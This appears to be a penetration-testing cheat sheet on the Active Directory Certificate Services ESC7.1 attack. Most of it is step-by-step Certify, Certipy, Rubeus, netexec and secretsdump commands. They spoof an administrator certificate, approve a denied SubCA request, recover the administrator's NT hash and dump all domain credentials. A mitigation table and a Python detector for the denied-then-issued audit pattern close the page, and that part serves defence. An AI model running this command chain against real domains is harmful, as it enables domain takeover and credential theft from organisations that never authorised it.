# ESC7

### **What is ESC7?**

Like other securable objects in Active Directory, the Certificate Authority itself can have **overly permissive ACLs**. ESC7 occurs when a low-privileged user is granted one or both of these dangerous rights directly on the CA:

| Right                                                  | What It Allows                                                         |
| ------------------------------------------------------ | ---------------------------------------------------------------------- |
| **ManageCA** (CA Administrator)                        | Change CA configuration, enable SAN on all templates, add new officers |
| **ManageCertificates** (Certificate Manager / Officer) | Approve and issue certificate requests that are pending or were denied |

> If you only have **ManageCA** but not ManageCertificates, you can grant yourself ManageCertificates by adding your account as a new **Officer** (a user with certificate manager rights).

***

#### **CBA Patch Consideration**

Since Microsoft's **Certificate-Based Authentication (CBA)** patches introduced strong certificate mapping checks, the classic ESC6 path via `EDITF_ATTRIBUTESUBJECTALTNAME2` (enabling SAN on all templates using ManageCA) is **no longer effective** in fully patched environments.

Two alternate attack paths remain viable even with the CBA patch in Full Enforcement mode:

| Path       | Method                                                                                  | Reference                                                                  |
| ---------- | --------------------------------------------------------------------------------------- | -------------------------------------------------------------------------- |
| **ESC7.1** | Abuse the `SubCA` template: submit a request that is denied, then approve it using ManageCertificates | [Tarlogic ESC7](https://www.tarlogic.com/blog/ad-cs-esc7-attack/)          |
| **ESC7.2** | Abuse CRL Distribution Points (CDPs) to deploy SYSTEM web shells to the CA server       | [Tarlogic ManageCA RCE](https://www.tarlogic.com/blog/ad-cs-manageca-rce/) |

These notes cover **ESC7.1**.

***

### **How ESC7.1 Works**

The `SubCA` template is essentially ESC1-vulnerable, but **only administrators can enroll in it by default**. The trick is:

1. Submit a certificate request using the `SubCA` template with a spoofed SAN; it will be **denied** because you lack enroll rights
2. The private key is saved locally despite the denial
3. Use **ManageCertificates** rights to **approve and issue** the denied request
4. Retrieve the issued certificate and combine it with your saved private key
5. Use the certificate to authenticate as the target account

***

### **Prerequisites**

* User has **ManageCA** rights on the CA (can grant themselves ManageCertificates if missing)
* **ManageCertificates** rights (or ability to add self as officer)
* `SubCA` template is enabled (can be enabled via ManageCA if disabled)

***

### **Exploitation: Windows (ESC7.1)**

**Step 1: Enumerate**

```bash
certify.exe find
```

Look for `Allow, ManageCA, ManageCertificates` on your user or group.

***

**Step 2: Submit the Failing Request**

```bash
certify.exe request /ca:<CA_NAME> /template:SubCA /altname:administrator /domain:domain.corp /sidextension:<ADMIN_SID>
```

Expected output: `The submission failed: Denied by the policy module`

Despite the denial, **save the private key** output as `esc7.pem`.

Note the **Request ID** from the output (e.g. `58`).

***

**Step 3: Approve the Denied Request**

```bash
certify-esc7.exe issue /ca:<CA_NAME> /id:58
```

Expected output: `Certificate issued!`

***

**Step 4: Download the Approved Certificate**

```bash
certify-esc7.exe download /ca:<CA_NAME> /id:58
```

Append the downloaded certificate to your saved private key file:

```bash
type downloaded.pem >> esc7.pem
```

***

**Step 5: Convert to PFX**

```bash
openssl pkcs12 -in esc7.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc7.pfx
```

Enter a password when prompted (e.g. `Passw0rd!`).

***

**Step 6: Request TGT and Access DC**

```bash
Rubeus.exe asktgt /user:administrator /certificate:esc7.pfx /password:Passw0rd! /domain:domain.corp /nowrap /ptt
```

```bash
klist
winrs -r:dc01.domain.corp cmd
```

***

### **Exploitation: Linux (ESC7.1)**

**Step 1: Enumerate**

```bash
certipy find -u internaluser@domain.corp -hashes <NT_HASH> -stdout
```

Look for `ManageCA` and `ManageCertificates` permissions on the CA object.

***

**Step 2: Add Yourself as Officer (if missing ManageCertificates)**

```bash
certipy ca -u internaluser@domain.corp -hashes <NT_HASH> -ca <CA_NAME> -dc-ip <DC_IP> -target ca.domain.corp -add-officer internaluser
```

***

**Step 3: Enable SubCA Template (if disabled)**

```bash
certipy ca -u internaluser@domain.corp -hashes <NT_HASH> -ca <CA_NAME> -dc-ip <DC_IP> -target ca.domain.corp -enable-template SubCA
```

***

**Step 4: Submit the Failing Request**

```bash
certipy req -u internaluser@domain.corp -hashes <NT_HASH> -target ca.domain.corp -ca <CA_NAME> -template SubCA -upn administrator@domain.corp -extension-sid <ADMIN_SID> -out esc7_certipy -dc-ip <DC_IP>
```

This request is expected to be denied. The **private key is saved** and the **Request ID** is shown in the output.

***

**Step 5: Approve the Denied Request**

```bash
certipy ca -u internaluser@domain.corp -hashes <NT_HASH> -ca <CA_NAME> -dc-ip <DC_IP> -target ca.domain.corp -issue-request <REQUEST_ID>
```

***

**Step 6: Retrieve the Issued Certificate**

```bash
certipy req -u internaluser@domain.corp -hashes <NT_HASH> -ca <CA_NAME> -dc-ip <DC_IP> -target ca.domain.corp -retrieve <REQUEST_ID> -out esc7_certipy
```

***

**Step 7: Authenticate and Retrieve NTLM Hash**

```bash
certipy auth -pfx esc7_certipy.pfx -domain domain.corp
```

This performs **UnPAC-the-Hash**, returning the NT hash of the administrator account.

***

**Step 8: Pass-the-Hash**

```bash
netexec smb dc01.domain.corp -u administrator -H <NT_HASH>
```

Or dump all credentials:

```bash
secretsdump.py -hashes :<NT_HASH> 'domain.corp/administrator@dc01.domain.corp'
```

***

### **Key Differences: ESC7.1 vs Other ESCs**

|                      | ESC1                                    | ESC7.1                                      |
| -------------------- | --------------------------------------- | ------------------------------------------- |
| **Requires**         | Enroll rights on misconfigured template | ManageCA / ManageCertificates on the CA     |
| **Template target**  | Any vulnerable template                 | SubCA specifically                          |
| **Request outcome**  | Approved immediately                    | Intentionally denied then manually approved |
| **CBA patch bypass** | Requires `-extension-sid`               | Yes — SID extension in SubCA request        |

***

### **Mitigation**

| Fix                     | How                                                               |
| ----------------------- | ----------------------------------------------------------------- |
| Audit CA ACLs           | Remove ManageCA / ManageCertificates from non-admin accounts      |
| Restrict SubCA template | Disable if not required                                           |
| Enable CA audit logging | Log all certificate issuance and approval events                  |
| Regular ACL reviews     | Use BloodHound / Certipy to identify over-permissioned CA objects |
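The "Enable CA audit logging" mitigation only pays off if something watches the events, and the ESC7.1 chain above leaves a distinctive trail: a request that is denied and later issued for the same Request ID, often preceded by a change to the CA's officer list. The following detection logic is an added example, not code from the page or from the tools it references; it assumes Security log events have already been parsed into dicts with the field names shown, and uses the AD CS audit event IDs 4886 (request received), 4887 (request approved/issued), 4888 (request denied) and 4890 (CA security settings changed). The sample events are constructed.

```python
"""Correlate AD CS audit events to flag the ESC7.1 denied-then-issued pattern."""

# Constructed sample events in log order. Field names are an assumption about
# how the Windows Security log has been parsed, not a fixed schema.
SAMPLE_EVENTS = [
    # Officer list changed: the low-privileged user added as Certificate Manager.
    {"id": 4890, "subject": "CORP\\internaluser",
     "detail": "Certificate Managers: added CORP\\internaluser"},
    {"id": 4886, "request_id": 58, "requester": "CORP\\internaluser", "template": "SubCA"},
    {"id": 4888, "request_id": 58, "requester": "CORP\\internaluser", "template": "SubCA"},
    {"id": 4887, "request_id": 58, "requester": "CORP\\internaluser", "template": "SubCA",
     "issued_by": "CORP\\internaluser"},
    # A benign request approved on first submission (should not alert).
    {"id": 4886, "request_id": 59, "requester": "CORP\\webserver$", "template": "WebServer"},
    {"id": 4887, "request_id": 59, "requester": "CORP\\webserver$", "template": "WebServer",
     "issued_by": "CORP\\pkiadmin"},
]

# Templates whose issuance is always worth a look, per the mitigation table.
WATCHED_TEMPLATES = {"SubCA"}


def find_esc7_indicators(events):
    """Return alert tuples for CA security changes, denied-then-issued requests,
    and any issuance from a watched template."""
    alerts = []
    denied = {}  # request_id -> the 4888 event that denied it
    for ev in events:
        if ev["id"] == 4890:
            # Any change to CA security (officers, ACLs) is rare and high-signal.
            alerts.append(("ca_security_changed", ev["subject"], ev["detail"]))
        elif ev["id"] == 4888:
            denied[ev["request_id"]] = ev
        elif ev["id"] == 4887:
            rid = ev["request_id"]
            if rid in denied:
                # Core ESC7.1 signal: the policy module said no, an officer said yes.
                alerts.append(("denied_then_issued", rid, ev["template"], ev.get("issued_by")))
            elif ev["template"] in WATCHED_TEMPLATES:
                alerts.append(("watched_template_issued", rid, ev["template"], ev.get("issued_by")))
    return alerts


if __name__ == "__main__":
    for alert in find_esc7_indicators(SAMPLE_EVENTS):
        print(alert)
```

In production the `denied` map should be bounded by time (a legitimate re-approval days later is not the same signal as one minutes later), and the 4890 detail should be checked against an allow-list of PKI administrators.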

***

#### **Resources**

* [Tarlogic — AD CS ESC7 Attack](https://www.tarlogic.com/blog/ad-cs-esc7-attack/)
* [Tarlogic — ManageCA RCE (ESC7.2)](https://www.tarlogic.com/blog/ad-cs-manageca-rce/)
* [Red & Blue Team Security — ESC7 Walkthrough](https://www.rbtsec.com/blog/active-directory-certificate-attack-esc7/)
* Altered Security AD CS Course
